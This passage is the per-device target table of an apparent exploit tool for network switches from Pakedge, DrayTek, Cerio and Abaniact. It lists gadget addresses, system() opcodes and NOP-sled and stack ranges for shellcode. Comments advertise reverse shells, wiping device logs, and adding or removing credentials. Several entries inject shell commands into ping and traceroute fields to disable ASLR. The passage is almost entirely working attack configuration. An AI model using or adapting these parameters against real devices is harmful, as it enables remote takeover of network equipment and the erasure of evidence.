						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'dispatcher.cgi'</span><span class="token punctuation">,</span>			<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; main()</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=_USRNOP&amp;password=_PWDNOP_RA_START&amp;login=1&amp;_USRNOP_USRNOP_SHELLCODE'</span><span class="token punctuation">,</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x7fff7004</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x7fc60000</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">28</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">20</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">0</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># Pakedgedevice &amp; Software</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: No (cannot point JMP correct into NOP on heap)</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : Yes</span>
			<span class="token comment"># Del /mntlog/flash.log  : Yes</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'225-21785'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'SX-8P'</span><span class="token punctuation">,</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'Pakedge'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'1.04'</span><span class="token punctuation">,</span>							<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40C86C</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f998538</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x248492ec</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x413AEC</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x413A14</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x413A14</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x4108E4</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x4108E4</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x4108E4</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'set.cgi'</span><span class="token punctuation">,</span>				<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x7ffeff04</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x7fc60000</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">64</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">77</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">3</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># Draytek</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: No (cannot point JMP correct into NOP on heap)</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : Yes</span>
			<span class="token comment"># Del /mntlog/flash.log  : Yes</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'752-95168'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'DrayTek'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'2.1.4'</span><span class="token punctuation">,</span>						<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'VigorSwitch P1100'</span><span class="token punctuation">,</span>  			<span class="token comment">#</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.draytek.com/products/vigorswitch-p1100/'</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40C67C</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f99852c</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x248490ac</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x413E34</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x413D64</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x413D64</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x410CA8</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x410CA8</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x410CA8</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'set.cgi'</span><span class="token punctuation">,</span>				<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x7ffeff04</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x7fc60000</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">64</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">77</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">3</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># Cerio</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : Yes</span>
			<span class="token comment"># Del /mntlog/flash.log  : Yes</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'224-5061'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'Cerio'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'1.00.29'</span><span class="token punctuation">,</span>				<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'CS-2424G-24P'</span><span class="token punctuation">,</span>  			<span class="token comment">#</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.cerio.com.tw/eng/switch/poe-switch/cs-2424g-24p/'</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40E6DC</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f998524</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x248411bc</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi;  cgi_diag_traceroute_set()</span>
						<span class="token string">'sys_ping_post_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;srvHost=127.0.0.1 ;echo 0 &gt; /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check;&amp;count=1'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_check'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'web_sys_ping_post'</span><span class="token punctuation">:</span><span class="token number">0x40E114</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>

						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x41DB4C</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x41DA94</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x41DA94</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x415F14</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x415F14</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x415F14</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>			<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'set.cgi'</span><span class="token punctuation">,</span>				<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x7ffeff04</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x7fc60000</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">64</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">77</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">3</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># Abaniact</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : No</span>
			<span class="token comment"># Del /mntlog/flash.log  : No</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'222-45866'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'Abaniact'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'116B00033'</span><span class="token punctuation">,</span>				<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'AML2-PS16-17GP L2'</span><span class="token punctuation">,</span>			<span class="token comment"># Model</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.abaniact.com/L2SW/'</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40E65C</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f998524</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system) # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x2484152c</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token comment"># Ping IPv4</span>
						<span class="token comment">#'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 &gt; /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&amp;count=1',</span>
						<span class="token comment">#'verify_uri':'/tmp/pingtest_tmp',</span>
						<span class="token comment">#'web_sys_ping_post':0x4296FC,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_ping_post()</span>

						<span class="token comment"># traceroute</span>
						<span class="token string">'web_sys_ping_post'</span><span class="token punctuation">:</span><span class="token number">0x429F58</span><span class="token punctuation">,</span>	<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_trace_route_post()</span>
						<span class="token string">'sys_ping_post_cmd'</span><span class="token punctuation">:</span><span class="token string">'ip=127.0.0.1 ;echo 0 &gt; /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space &gt; /tmp/traceroute_tmp #&amp;tr_maxhop=30&amp;count=1'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/traceroute_tmp'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x4B4FE4</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
